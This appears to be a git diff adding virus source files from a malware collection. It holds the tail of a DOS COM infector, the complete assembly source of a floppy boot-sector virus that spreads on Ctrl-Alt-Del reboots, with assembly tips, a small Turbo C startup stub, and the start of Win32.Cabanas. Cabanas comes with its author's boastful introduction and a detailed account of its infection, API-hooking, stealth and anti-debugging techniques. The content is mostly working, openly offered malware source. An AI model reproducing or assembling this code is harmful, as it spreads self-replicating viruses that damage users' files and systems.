cs:[eof],ax ;Save pointer to the end of file + db 3E ;Force DS: prefix + cmp [newid],'VI' ;Infected? + je close ;Go find next file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + cmp [counter],5 ;If counter goes above 5, + jb progok ; the program becomes "sick" + mov ax,40 + mov ds,ax ;Get the system timer value + mov ax,word ptr ds:[timer] + push cs + pop ds ;Restore DS + and ax,1 ;At random (if timer value is odd) + jz progok ; display the funny message + mov dx,offset message + mov ah,9 ;Print string + int 21 + int 20 ;Terminate program + +message db 'Program sick error:Call doctor or ' + db 'buy PIXEL for cure description',0A,0Dh,'$' + +progok: + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + dw 0 ;Unused + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-a-d.asm b/MSDOS/Virus.MSDOS.Unknown.c-a-d.asm new file mode 100644 index 00000000..5831a947 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-a-d.asm @@ -0,0 +1,431 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;-----------------------------------------------------------------------; +; This virus is of the ?FLOPPY ONLY? variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) + MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... + JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... + JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET ?JUST INFECTED ANOTHER ONE?... + INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.c0t.asm b/MSDOS/Virus.MSDOS.Unknown.c0t.asm new file mode 100644 index 00000000..88d72658 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c0t.asm @@ -0,0 +1,26 @@ +; 'Extra-Tiny' memory model startup code for Turbo C 2.0 +; +; This makes smaller executable images from C programs, by +; removing code to get command line arguments and the like. +; Compile with Tiny model flag, do not use any standard I/O +; library functions, such as puts() or int86(). +; +; This code courtesey PC Magazine, December 26, 1989. +; But nobody really needs to know that. + + +_text segment byte public 'code' +_text ends +_data segment word public 'data' +_data ends +_bss segment word public 'bss' +_bss ends + +dgroup group _text, _data, _bss + +_text segment + org 100h +begin: +_text ends + + end begin diff --git a/MSDOS/Virus.MSDOS.Unknown.cabanas.asm b/MSDOS/Virus.MSDOS.Unknown.cabanas.asm new file mode 100644 index 00000000..5fdd1513 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cabanas.asm @@ -0,0 +1,2638 @@ +; +; 苒圹圹 苒圹圹 苒圹圹 +; Win32.Cabanas.2999 圹 圹 圹 圹 圹 圹 +; by Jacky Qwerty/29A 苘苒圻 咣圹圹 圹圹圹 +; 圹圮苘 苘苘圹 圹 圹 +; 圹圹圹 圹圹圹 圹 圹 +; +; I'm very proud to introduce the first "resident" WinNT/Win95/Win32s virus. +; Not only it's the first virus stayin resident on NT, but is also the first +; with stealth, antidebuggin and antiheuristic capabilitiez. In short wordz, +; this babe is a "per process" memory resident, size stealth virus infecting +; Portable Executable filez on every existin Win32-based system. Those who +; dont know what a "per process" resident virus is, it means a virus staying +; resident inside the host Win32 aplication's private space, monitoring file +; activity and infectin PE filez opened or accesed by such Win32 aplication. +; +; The purpose of this virus is to prove new residency techniquez that can be +; exploited from genuine Win32 infectorz, without all the trouble of writing +; especific driverz for Win95 (VxDs), and WinNT. A genuine Win32 infector is +; a virus bein able to work unmodified across all Win32 platformz available: +; Win95, WinNT and any other future platform suportin the Win32 API interfa- +; ce. So far only Win95 especific virusez have been found, not Win32 genuine +; onez. Make sure to read the complete description about Win32.Cabanas writ- +; ten by P倀er Sz攔, available at http://www.avp.ch/avpve/newexe/win32/caba- +; nas.stm. U can also read description by Igor Daniloff from Dr.Web, availa- +; ble at http://www.dials.ccas.ru/inf/cabanas.htm as well. +; +; After readin P倀er Sz攔's description about Win32.Cabanas, i realized he'd +; really made a very serious profesional work. So good that he didnt seem to +; miss any internail detail in the virus, as if he had actually writen the +; bug himself or as if he was actually me, hehe. Obviosly, none of the prior +; onez are true. But, nevertheless, i think it's worth to take his work into +; account even from the VX side of the fence. Really i dunno what's left for +; me to say after such description, so i will simply add my own personal co- +; mentz to P倀er's log. Erm.. btw why dont u join us? heh >8P +; +; +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; 1. Technical Description +; 哪哪哪哪哪哪哪哪哪哪哪哪 +; Win32.Cabanas is the first known 32-bit virus that works under Windows NT +; Server, Windows NT workstation, Windows 95 and Windows 3.x extended with +; Win32s sub-system. It was found in late 1997. +; +; Win32.Cabanas is a per-process memory resident, fast infecting, antidebug- +; ged, partially packed/encrypted, anti-heuristic, semi-stealth virus. The +; "Win32" prefix is not misleading, as the virus is also able to spread in +; all Win32 based systems: Windows NT, Windows 95 and Win32s. The author of +; the virus is a member of the 29A group, the same young virus writer who +; wrote the infamous CAP.A virus. +; +; +; 1.1. Running an infected PE file +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; When a Win32.Cabanas infected file is executed, the execution will start +; at the original host entry point. Surprisingly, Cabanas does not touch +; the entry point field in the Image File Header. Instead it patches the +; host program at its entry point. Five bytes at the entry point is replaced +; with a FAR JMP to the address where the original program ended. This can +; be considered as an anti-heuristic feature, as the host entry point value +; in the PE header keeps pointing inside the code section, possibly turning +; off some heuristic flags. +; +; Thus the first JMP points to the real entry point. The first function in +; Cabanas unpacks and decrypts a string table which consists of Win32 KERNEL +; API names. The unpack mechanism is simple but effective enough. Cabanas is +; also an armored virus. It uses "Structured Exception Handling" (typically +; abbreviated as "SEH") as an anti-debug trick. This prevents debugging from +; any application-level debugger, such as TD32. +; +; When the unpack/decryptor function is ready, the virus calls a routine to +; get the original Base Address of KERNEL32.DLL. During infection time, the +; virus searches for GetModuleHandleA and GetModuleHandleW API in the Import +; Table, respectively. When it finds them, it saves a pointer to the actual +; DWORD in the .idata list. Since the loader puts the addresses to this +; table before it executes the virus, Cabanas gets them easily. +; +; If the application does not have a GetModuleHandleA / GetModuleHandleW API +; import, the virus uses a third undocumented way to get the Base Address of +; KERNEL32.DLL by getting it from the ForwarderChain field in the KERNEL32 +; import. Actually this will not work under Windows NT, but on Win95 only. +; When the virus has the Base Address/Module Handle of KERNEL32.DLL, it +; calls its own routine to get the address of GetProcAddress function. The +; first method is based on the search of the Import Table during infection +; time. The virus saves a pointer to the .idata section whenever it finds a +; GetProcAddress import in the host. In most cases Win32 applications import +; the GetProcAddress API, thus the virus should not use a secondary routine +; to get the same result. If the first method fails, the virus calls another +; function which is able to search for GetProcAddress export in KERNEL32. +; Such function could be called as GetProcAddress-From-ExportsTable. This +; function is able to search in KERNEL32's Exports Table and find the +; address of GetProcAddress API. +; +; This function is one of the most important ones from the virus point of +; view and it is compatible with all Win32 based systems. If the entry point +; of GetProcAddress was returned by the GetProcAddress-From-ExportsTable +; function, the virus saves this address and use it later on. Otherwise, the +; GetProcAddress-From-ExportsTable function will be used several times. This +; function is also saved with "Structured Exception Handling" to avoid from +; possible exceptions. After this, the virus gets all the API addresses it +; wants to use in a loop. When the addresses are available, Cabanas is ready +; to replicate and call its direct action infection routine. +; +; +; 1.2. Direct action infection +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; The direct action infection part is surprisingly fast. Even though the +; virus goes through all the files in Windows directory, Windows System +; directory and in the current directory respectively, the file infection +; is fast enough to go unnoticed in much systems. This is because the virus +; works with "memory mapped files", a new feature implemented in Win32 based +; systems which simplifies file handling and increases system performance. +; +; First the virus gets the name of Windows directory, then it gets the name +; of Windows System directory and calls the function which searches for non- +; infected executable images. It searches for non directory entries and +; check the size of the files it found. +; +; Files with size dividable by 101 without reminder are assumed to be +; infected. Other files which are too huge will not be infected either. +; After this, the virus checks the file extension, if it matches EXE or +; SCR (screen saver files), the virus opens and maps the file. If the file +; is considered too short, the file is closed. Then it checks the`MZ' marker +; at the beginning of the image. Next it positions to the possible `PE' +; header area and checks the `PE' signature. It also checks that the +; executable was made to run on 386+ machines and looks for the type of +; the file. DLL files are not infected. +; +; After this, the virus calculates a special checksum which uses the +; checksum field of PE files Optional Header and the file-stamp field of +; the Image File Header. If the file seems to be infected the virus closes +; the file. If not, the file is chosen for infection. Cabanas then closes +; the file, blanks the file attribute of the file with SetFileAttributeA API +; and saves the original attributes for later use. This means the virus is +; not stopped by the "Read Only" attribute. Then again, it opens and maps +; the possible host file in read/write mode. +; +; Next it searches for the GetModuleHandleA, GetModuleHandleW and +; GetProcAddress API imports in the host Import Table and calculates +; pointers to the .idata section. Then it calls the routine which +; patches the virus image into the file. +; +; This routine first checks that the .idata section has MEM_WRITE +; characteristics. If not it sets this flag on the section, but only if +; this section is not located in an executable area. This prevents the +; virus from turning on suspicious flags on the code section, triggered +; by some heuristic scanner. +; +; Then it goes to the entry point of the image and replaces five bytes +; with a FAR JMP instruction which will point to the original end of the +; host. After that it checks the relocation table. This is because some +; relocations may overwrite the FAR JMP at the entry point. If the +; relocation table size is not zero the virus calls a special routine +; to search for such relocation entries in the .reloc area. It clears +; the relocation type on the relocation record if it points into the FAR +; JMP area, thus this relocation will not take into account by the loader. +; The routine also marks the relocation, thus Cabanas will be able to +; relocate the host later on. Then it crypts all the information which has +; to be encrypted in the virus body. Including the table which holds the +; original 5 bytes from the entry point and its location. +; +; Next the virus calculates the special checksum for self checking purposes +; and saves this to the time stamp field of the PE header. When everything +; is ready, the virus calculates the full new size of the file and makes +; this value dividable by 101. The real virus code is around 3000 bytes +; only but the files will grow with more bytes, because of this. Cabanas +; has a very important trick here. The virus does not create a new section +; header to hold its code, but patches the last section header in the file +; (usually .reloc) to grow the section body large enough to store the virus +; code. This makes the infection less risky and less noticeable. +; +; Then the virus changes the SizeOfImage field in the PE header to reflect +; the changes made to the last section in the file, then unmaps and closes +; the file. Next it truncates the file at the previously calculated size +; and restores the original time and date stamp. Finally Cabanas resets the +; original attribute of the file. When all the possible files have been +; checked for infection, Cabanas is ready to go memory resident. +; +; +; 1.3. Rebuild the host, Hook API functions and Go memory resident +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; The next phase is to rebuild the host program. The virus locates an +; internal parameter block which consists of the previously encrypted code +; from the host (5 bytes) and writes back the 5 original bytes at the entry +; point. After this, it relocates the code area if needed, by searching in +; the .reloc section for marked relocation entries. Next the virus hooks +; API functions and goes memory resident. +; +; The API hooking technique is based on the manipulation of the Import +; Table. Since the host program holds the addresses of imported functions +; in its .idata section, all the virus has to do is to replace those +; addresses to point to its own API handlers. +; +; To make those calculations easy, the virus opens and maps the infected +; program. Then it allocates memory for its per-process part. The virus +; allocates a 12232 bytes block and copies itself into this new allocated +; area. Then it searches for all the possible function names it wants to +; hook: GetProcAddress, GetFileAttributesA, GetFileAttributesW, MoveFileExA, +; MoveFileExW, _lopen, CopyFileA, CopyFileW, OpenFile, MoveFileA, MoveFileW, +; CreateProcessA, CreateProcessW, CreateFileA, CreateFileW, FindClose, +; FindFirstFileA, FindFirstFileW, FindNextFileA, FindNextFileW, SetFileAttrA, +; SetFileAttrW. Whenever it finds one of the latter APIs, it saves the +; original address to its own JMP table and replaces the .idata section's +; DWORD (which holds the original address of the API) with a pointer to its +; own API handlers. Finally the virus closes and unmaps the host and starts +; the application, by jumping into the original entry point in the code +; section. +; +; Some Win32 applications however may not have imports for some of these +; file related APIs, they can rather retrieve their addresses by using +; GetProcAddress and call them directly, thus the virus would be unable +; to hook this calls. Not so fast. The virus also hooks GetProcAddress +; for a special purpose. GetProcAddress is used by most applications. +; When the application calls GetProcAddress the virus new handler first +; calls the original GetProcAddress to get the address of the requested +; API. Then it checks if the Module Handle parameter is from KERNEL32 and +; if the function is one of the KERNEL32 APIs that the virus wants to hook. +; If so, the virus returns a new API address which will point into its +; NewJMPTable. Thus the application will still get an address to the virus +; new handler in such cases as well. +; +; +; 1.4. Stealth and fast infection capabilities +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Cabanas is a semi-stealth virus: during FindFirstFileA, FindFirstFileW, +; FindNextFileA and FindNextFileW, the virus checks for already infected +; programs. If the program is not infected the virus will infect it, +; otherwise it hides the file size difference by returning the original +; size for the host program. During this, the virus can see all the file +; names the application accesses and infects every single clean file. +; +; Since the CMD.EXE (Command Interpreter of Windows NT) is using the above +; APIs during a DIR command, every non infected file will be infected (if +; the CMD.EXE was infected previously by Win32.Cabanas). The virus will +; infect files during every other hooked API request as well. +; +; Apart from the encrypted API names strings, the virus also contains the +; following copyright message: +; +; (c) Win32.Cabanas v1.0 by jqwerty/29A. +; +; +; 1.5. Conclusion +; 哪哪哪哪哪哪哪 +; Win32.Cabanas is a very complex virus with several features new in Win32 +; based systems. It shows quite interesting techniques that can be used in +; the near future. It demonstrates that a Windows NT virus should not have +; any Windows 95 or Windows NT especific functionality in order to work on +; any Win32 system. The "per-process" residency technique also shows a +; portable viable solution to avoid known compatibility issues between +; Windows 95 and Windows NT respecting their low level resident driver +; implementations. Virus writers can use these techniques and their +; knowledge they have had on Windows 95 to come to a more robust platform. +; So far Win32.Cabanas has made this first step. +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; +; +; 2. Shortcutz +; 哪哪哪哪哪哪 +; (*) http://www.dials.ccas.ru/inf/cabanas.htm +; +; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 +; Win32.Cabanas: A brief description +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Igor A. Daniloff +; +; Win32.Cabanas is the first known virus that infects files under Microsoft +; 32-bit Windows operating systems (Win32s/Windows 95/Windows NT). Not only +; is it capable of infecting PortableExecutable files, but also remains +; resident in the current session of an infected program in all these +; Windows systems. +; +; The viruses specifically designed for Windows 95 thus far could not +; properly infect files in Windows NT. Although files of Windows 95 and +; Windows NT have identical PE format, certain fields in their PE headers +; are different. Therefore, for infecting files under Windows NT, the PE +; header must be modified appropriately; otherwise Windows NT would display +; an error message in the course of loading the file. Furthermore, viruses +; encounter certain problems in determining the base addresses of WIN32 +; KERNEL API in the memory, because KERNEL32.DLL in Windows 95 and Windows +; NT are located at different memory addresses. But Win32.Cabanas smartly +; handles these problems. On starting an infected file, the virus gets +; control, unpacks and decrypts its table of names of WIN32 KERNEL API +; procedures that are needed in the sequel, and then determines the base +; address of KERNEL32.DLL and the addresses of all necessary WIN32 KERNEL +; API functions. +; +; While infecting a file, Win32.Cabanas finds the names of GetModuleHandleA, +; GetModuleHandleW, and GetProcAddress functions from the Import Table and +; stores in its code the offsets of the addresses of these procedures in the +; Import Table (in the segment .idata, as a rule). If the names of these +; procedures are not detectable, Win32.Cabanas uses a different undocumented +; method of finding the base address of KERNEL32 and the addresses of WIN32 